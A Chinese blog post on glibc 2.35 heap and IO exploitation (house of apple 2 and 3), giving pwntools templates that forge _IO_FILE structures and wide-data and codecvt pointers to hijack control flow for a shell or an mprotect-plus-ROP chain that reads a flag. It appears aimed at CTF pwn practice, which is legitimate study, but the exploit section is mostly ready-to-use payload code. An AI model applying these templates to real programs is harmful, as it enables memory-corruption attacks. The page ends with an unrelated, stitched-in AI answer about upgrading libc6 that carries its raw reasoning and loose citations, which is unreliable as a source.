libc2.35时代IO利用

原创 于 2024-12-30 06:00:00 发布 · 1.3k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #前端 #linux

文章中的利用方法主要针对libc2.35,高版本可做适当修改利用。话不多说,直接开始。

house of apple系列
libc2.35后的IO利用最知名的就是house of apple了,一共三个系列文章,是roderick师傅发现并广泛利用。

house of apple2
基于IO_FILE->_wide_data的利用技巧
条件:

已知heap地址和libc地址

能控制程序执行IO操作,包括但不限于:从main函数返回、调用exit函数、通过__malloc_assert触发

能控制vtable和_wide_data,一般使用largebin attack去控制
利用_IO_wfile_overflow函数控制程序执行流:
调用链:_IO_wfile_overflow -> _IO_wdoallocbuf -> _IO_WDOALLOCATE
getshell模板

def house_of_apple2(fake_IO_file_addr):
fake_IO_file = flat(
{
0x18: 1, # _IO_write_ptr
0x58: one_gadget, # chain
0x78: _IO_stdfile_2_lock, # _lock
0x90: fake_IO_file_addr, # _IO_wide_data
0xc8: _IO_wfile_jumps, # vtable
0xd0: fake_IO_file_addr, # fake wide vtable
}, filler=‘\x00’
)

return fake_IO_file
ORW模板

def house_of_apple2(fake_IO_file_addr):
fake_IO_file = flat(
{
0x18: 1, # _IO_write_ptr
0x58: setcontext + 61, # chain
0x78: _IO_stdfile_2_lock, # _lock
0x90: fake_IO_file_addr + 0x100, # _IO_wide_data
0xc8: _IO_wfile_jumps, # vtable
0xf0: {
0xa0: [fake_IO_file_addr + 0x200, ret],
0xe0: fake_IO_file_addr
},
0x1f0: [
pop_rdi_ret, fake_IO_file_addr >> 12 << 12,
pop_rsi_ret, 0x2000,
pop_rdx_rbx_ret, 7, 0,
pop_rax_ret, 10, # mprotect
syscall_ret,
fake_IO_file_addr + 0x290
],
0x280: asm(shellcraft.cat(‘flag’))

    }, filler='\x00'
)
payload = fake_IO_file

return payload

注意: 上述模板中fake_IO_file_addr地址为伪造的_IO_FILE起始地址。

house of apple3
基于IO_FILE->_codecvt的利用方法。
条件:

已知heap地址和libc基址
能控制程序执行IO操作,包括但不限于:从main函数返回、调用exit函数、通过**__malloc_assert触发
能控制IO_FILE的vtable和_codecvt**,一般使用largebin attack去控制
利用_IO_wfile_underflow控制程序执行流
调用链:_IO_wfile_underflow -> libio_codecvt_in -> fp->codecvt -> cd_in.step -> __fct(函数指针)
_IO_wfile_underflow
__libio_codecvt_in
DL_CALL_FCT
gs = fp->_codecvt->__cd_in.step
*(gs->__fct)(gs)

getshell模板

def house_of_apple3(fake_IO_file_addr):
fake_ucontext = ucontext_t()
fake_ucontext.rip = ret
fake_ucontext.rsp = fake_IO_file_addr + 0x300
fake_ucontext.rdi = fake_IO_file_addr >> 12 << 12
fake_ucontext.rsi = 0x2000
fake_ucontext.rdx = 7

fake_IO_file = flat(
    {
        0: 0xffffffffffffffff,  # _IO_read_end
        0x18: 1,                # _IO_write_ptr
        0x30: fake_IO_file_addr + 0x100,    # _IO_buf_end = _codecvt.step
        0x88: fake_IO_file_addr + 0x40,     # _codecvt
        0x90: _IO_wide_data,
        0xc8: _IO_wfile_jumps + 0x8,        # vtable
        0xf0: {
            0: 0,   # key
            0x28: one_gadget,     # fun_ptr
        }
    }, filler='\x00'
)

payload = fake_IO_file
return payload

ORW模板
magic gadget: libc2.36及以上版本被去除

<getkeyserv_handle+576>

mov rdx, qword ptr [rdi + 8];
mov qword ptr [rsp], rax;
call qword ptr [rdx + 0x20]
def house_of_apple3(fake_IO_file_addr):
frame = SigreturnFrame()
frame.rip = ret
frame.rsp = fake_IO_file_addr + 0x200
frame.rdi = fake_IO_file_addr >> 12 << 12
frame.rsi = 0x2000
frame.rdx = 7

fake_IO_file = flat(
    {
        0: 0xffffffffffffffff,  # _IO_read_end
        0x18: 1,                # _IO_write_ptr
        0x30: fake_IO_file_addr + 0x100,    # _IO_buf_end = _codecvt.step
        0x88: fake_IO_file_addr + 0x40,     # _codecvt
        0x90: _IO_wide_data,
        0xc8: _IO_wfile_jumps + 0x8,        # vtable
        0xf0: {
            0: 0,   # key
            0x8: fake_IO_file_addr + 0x100,
            0x20: setcontext + 61,
            0x28: magic_gadget,     # fun_ptr
            0x30: bytes(frame)[0x30:]
        },
        0x1f0: [
            pop_rax_ret, 10,
            syscall_ret,
            fake_IO_file_addr + 0x230
        ],
        0x220: asm(shellcraft.cat('flag'))
    }, filler='\x00'
)

payload = fake_IO_file
return payload

可以结合国资社畜师傅提出的house of 一骑当千达到无条件ORW。

class ucontext_t:
‘’’
[0x1c0] must be NULL.
‘’’
length = 0x1c8
bin_str = length * b’\0’
rip = 0
rsp = 0
rbx = 0
rbp = 0
r12 = 0
r13 = 0
r14 = 0
r15 = 0
rsi = 0
rdi = 0

最低0.47元/天 解锁文章
House of apple 一种新的glibcIO攻击方法
pythonxxoo的博客
06-18 3152
目录* House of apple 一种新的glibcIO攻击方法 + 前言 + 利用条件 + 利用原理 + 利用思路 - 思路一:修改线程变量 - 思路二:修改结构体 - 思路三:修改线程变量之 - 思路四:修改全局变量 + 例题分析 - 题目分析 - 利用过程 + 总结提出一种新的中利用思路,暂且命名为。众所周知,高版本逐渐移除了等等一众全局变量,中题对钩子的利用将逐渐成为过去式。而想要在高版本利用成功,基本上就离不开对结构体的伪造与流的攻击。之前很多师傅都提出了一些优秀的攻击方法,比如house
探究高版本glibc(2.37)下对house of apple2利用(1)
qq_62172019的博客
05-19 867
探究apple2在高版本glibc的可行性
house of apple1
m0_63437215的博客
11-16 896
house of apple1
Ubuntu20.04更新GLIBC2.35版本
flysnow010的博客
07-03 8468
Ubuntu20.04默认GLIBC库版本是2.31.今天碰到一个软件需要2.35版本的GLIBC。需要升级到2.35版本。
关于glibc-all-in-one下载libc2.35以上报错问题
2302_79899078的博客
06-18 575
xclibc -x ./pwn ./libc-版本。下载2.35时报错:原因是缺少解压工具zstd。xclibc -c libc版本。下载后重新输命令就可以了。附加xclibc命令。
重学IO利用_IO_2_1_stdout泄露libc
2301_79327647的博客
08-19 1232
这几天做IO类的题,发现自己是真的菜,决定暂时放一放apple1的学习,重新学习一下IO流。 本篇源码还是glibc-2.35
glibc 2.35 pwn——house of apple v1 示例程序
CoLin的pwn小屋
01-11 1231
house of apple v1示例程序
pwn 堆入门之tcache
清霂的博客
05-13 680
目录ciscn_final_3ciscn_2019_es_1 ciscn_final_3 #!/usr/bin/env python3 # coding=utf-8 from pwn import * arch = "amd64" filename = "ciscn_final_3" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc l
记一次通过劫持glibc2.35的tls_dtor_list实现流程控制
qq_42915526的博客
11-05 694
最近碰到一道使用glibc 2.35版本的堆题,由于以前也没有真正接触过高版本glibc的堆利用,所以借着这次机会学习了如何通过控制tls_dtor_list来进行流程控制。
house of apple2(改进)
m0_63437215的博客
11-18 1717
house_of_apple2
glibc 2.35 pwn——house of apple v2 示例程序
CoLin的pwn小屋
03-18 1043
house of apple v2 演示程序
浅析house_of_apple2(下)
2301_79327647的博客
08-08 1177
''''''pause()delete(1)show(0)#恢复原样show(0)show(0)#恢复原样})ret0,##pop r12;
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 3693
强网杯2022 pwn 赛题分析——house_of_cat
house of apple2和house of cat的利用总结
2301_79327647的博客
08-15 979
最近感觉apple2和cat有些利用条件搞混了,就想出一篇博客总结一下。
CTF-PWN-堆-【house of apple1】
llovewuzhengzi的博客
03-02 1805
IO_flush_all_lockp在清理时会检查_IO_list_all链表(这是glibc所管理的全局FILE流链表),并对每个FILE对象应用相应的操作,如果满足条件(例如流正在写入模式并且有未冲洗的数据),则会调用vtable中_overflow函数指针所指向的函数。这些手动打开的文件流,连同标准输出和标准错误,构成了程序的“所有打开的输出流”。正常终止过程中,会发生一系列的清理工作,例如关闭所有打开的流(尤其是标准I/O流)来确保数据不会丢失,并且所有缓冲的输出都被写入它们对应的文件或设备中。
Largebin attack & house of cat
qq_42220888的博客
07-12 429
largebin attack house of cat
glibc 2.35 pwn——house of emma示例程序
CoLin的pwn小屋
08-18 2070
house of emma示例程序
Largebin_Attack知识理解(附赠堆分配释放过程回忆!)
a2590035252的博客
09-30 1348
朋友们好啊,我史混源行易太极门掌门人peiWhao。刚才有个朋友问我P老师发生甚么事了,我说怎么回事,给我发了几个网址,我一看!奥!原来是昨天,有一个年轻知识点,一个事largebin、、、、、、
安装GLIBC2.35失败
csdnluolong的专栏
12-10 6689
NA
Depends: libc6 (>= 2.38) but 2.35-0ubuntu3.11 is to be installed
最新发布
11-05
<think>我们面对的问题是:解决软件依赖中libc6版本要求 >= 2.38 但当前要安装的是2.35-0ubuntu3.11的问题。 引用[1]告诉我们如何检查cmake安装成功,引用[2]提到CUDA相关库的冲突问题及其解决方法(卸载手动安装的包或者忽略警告),引用[3]提到依赖库未正确安装的问题。 然而,我们的问题与libc6版本有关。libc6是GNU C库,是Linux系统中最基本的库之一。许多软件都依赖它。当软件要求libc6>=2.38,但系统中只有2.35时,我们需要升级libc6。 但是,升级glibc(即libc6)是一个非常敏感的操作,因为几乎所有的程序都依赖于它。如果不正确升级,可能导致系统无法启动。因此,我们需要谨慎。 常见的解决方案有: 1. 升级整个系统(尤其是Ubuntu)到更新的版本,因为新版的Ubuntu会提供更新版本的libc6。 2. 如果无法升级整个系统,可以尝试添加包含所需libc6版本的第三方仓库,然后从那里安装。但这样做风险很大,因为可能会破坏系统。 3. 在容器(如Docker)中运行该软件,容器使用一个包含所需libc6版本的基础镜像。 4. 从源代码编译该软件,使其链接到较旧版本的libc(但这样可能不可行,因为软件可能使用了新版本中的特性)。 考虑到安全性和稳定性,通常推荐方案1或方案3。 步骤: 方案1:升级Ubuntu系统 注意:升级系统可能会影响其他软件,请确保备份重要数据。 对于Ubuntu,可以按照以下步骤: - 首先更新当前系统:`sudo apt update && sudo apt upgrade` - 然后执行:`sudo do-release-upgrade` 方案3:使用Docker 如果软件提供了Docker镜像,可以直接使用。如果没有,可以自己创建一个Dockerfile,基于一个libc6版本>=2.38的镜像(如Ubuntu 22.04或更新版本)来构建和运行该软件。 例如,使用Docker的步骤: 1. 安装Docker:`sudo apt install docker.io` 2. 拉取一个基础镜像(如Ubuntu 22.04): `docker pull ubuntu:22.04` 3. 在容器中运行你的软件。 但是,请注意,如果软件需要访问硬件(如GPU),则Docker配置会复杂一些(需要添加`--gpus`参数并安装相应的驱动)。 另外,引用[2]中提到的问题是关于CUDA库的冲突,我们可以借鉴其思路:如果是因为系统中安装了多个版本的库导致冲突,可以考虑卸载冲突的版本。但是我们的问题不是冲突,而是版本过低,所以不适用。 鉴于上述分析,我们给出以下建议步骤: 1. 检查当前系统的Ubuntu版本,以及可用的升级版本。 运行:`lsb_release -a` 查看当前版本。 运行:`sudo do-release-upgrade -c` 检查是否有新版本可以升级。 2. 如果系统升级可行,则进行升级。 3. 如果不想升级系统,则考虑使用容器(如Docker)来运行该软件。 4. 如果以上都不行,尝试寻找是否有针对较旧系统编译的软件版本(可能需要联系软件提供商)。 注意:不要尝试手动替换系统的libc6,这非常危险。 由于引用[3]提到“依赖库未正确安装”,我们可以联想到,如果是其他库依赖libc6,那么同样需要升级系统或使用容器。 因此,我们推荐使用容器方案,因为它相对安全且不影响主机系统。 下面给出使用Docker运行软件的一个示例流程: 假设我们要运行的软件叫做`myapp`,它需要libc6>=2.38。 步骤: a. 编写Dockerfile: ```Dockerfile FROM ubuntu:22.04 # 安装必要的依赖 RUN apt-get update && apt-get install -y <所需依赖> # 将<所需依赖>替换为实际依赖 # 复制软件到镜像中 COPY myapp /usr/local/bin/myapp # 设置启动命令 CMD ["myapp"] ``` b. 构建镜像:`docker build -t myapp-image .` c. 运行容器:`docker run -it --rm myapp-image` 如果软件需要访问GPU,则需要在运行容器时添加`--gpus`参数,并确保主机已安装NVIDIA驱动和nvidia-container-toolkit。具体可参考NVIDIA Docker的相关文档。 如果升级系统或使用容器都不行,那么可能需要考虑更换操作系统(安装更新的Ubuntu版本)或者寻找替代软件。 注意:在升级系统之前,请务必备份重要数据。 关于引用[1]和引用[2],它们提供的信息与当前问题关联不大,但引用[2]中关于冲突的处理(卸载手动安装的包)的思路可以借鉴:如果系统中存在多个来源的libc6,可能会导致问题,但通常系统只有一个libc6。所以我们的问题主要是版本不够,而不是冲突。 因此,我们按照上述思路回答用户。 </think>### 解决 libc6 版本依赖问题(需要 ≥2.38,当前 2.35) #### 问题分析 软件依赖要求 `libc6 ≥ 2.38`,但当前系统版本为 `2.35-0ubuntu3.11`,属于 **GLIBC 版本过低** 的核心库冲突。直接升级系统级 `libc6` 风险极高(可能导致系统崩溃),以下是安全解决方案: --- ### 推荐解决方案(按优先级排序) #### ✅ 方案 1:升级 Ubuntu 系统(最安全) **原因**: Ubuntu 22.04(Jammy)默认提供 libc6 2.35,而 **Ubuntu 23.10+** 提供 libc6 ≥2.38[^1]。 **步骤**: ```bash # 1. 检查可升级版本 lsb_release -a # 确认当前版本 sudo do-release-upgrade -c # 检测可用升级 # 2. 执行系统升级 (需联网) sudo apt update && sudo apt full-upgrade sudo do-release-upgrade ``` **注意**: - 备份重要数据后再升级 - 升级后版本:Ubuntu 23.10 → libc6=2.37, Ubuntu 24.04 → libc6=2.39 #### ✅ 方案 2:容器化部署(推荐隔离方案) **使用 Docker 容器** 避免修改宿主机 GLIBC: ```Dockerfile # Dockerfile 示例 (基于 Ubuntu 24.04) FROM ubuntu:24.04 RUN apt update && apt install -y your-software-package ``` **操作流程**: ```bash # 1. 安装 Docker sudo apt install docker.io # 2. 构建并运行容器 docker build -t myapp . docker run -it --rm myapp ``` #### ⚠️ 方案 3:手动编译高版本 GLIBC(高风险) 仅当无法升级系统时考虑: ```bash # 1. 下载源码 (在独立目录操作!) wget https://ftp.gnu.org/gnu/glibc/glibc-2.38.tar.gz # 2. 编译安装到自定义路径 mkdir build && cd build ../glibc-2.38/configure --prefix=/opt/glibc-2.38 make -j$(nproc) sudo make install # 3. 指定软件使用新库 LD_LIBRARY_PATH=/opt/glibc-2.38/lib your-software ``` **风险提示**: ⚠️ 错误操作可能导致系统无法启动!需严格隔离安装路径[^3]。 --- ### 故障预防建议 1. **检查其他依赖**: ```bash ldd --version # 确认当前 GLIBC apt-cache policy libc6 # 查看可用版本 ``` 2. **解决库冲突**: 若出现类似引用[2]的多版本冲突,卸载冗余包: ```bash sudo apt purge cuda-toolkit libcudnn* # 示例卸载冲突CUDA包 [^2] ``` > **关键原则**:优先通过系统升级或容器化解决 GLIBC 依赖问题,避免直接替换核心库[^1][^3]。 --- ### 相关问题 1. 如何安全降级 Ubuntu 中的软件包版本? 2. Docker 容器中如何访问宿主机的 GPU 资源? 3. 编译 GLIBC 时出现 `make: *** No rule to make target ...` 错误如何解决? [^1]: 升级系统是解决核心库依赖的标准方法 [^2]: 多版本冲突时应优先卸载手动安装的库 [^3]: 直接修改 GLIBC 可能破坏系统稳定性
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值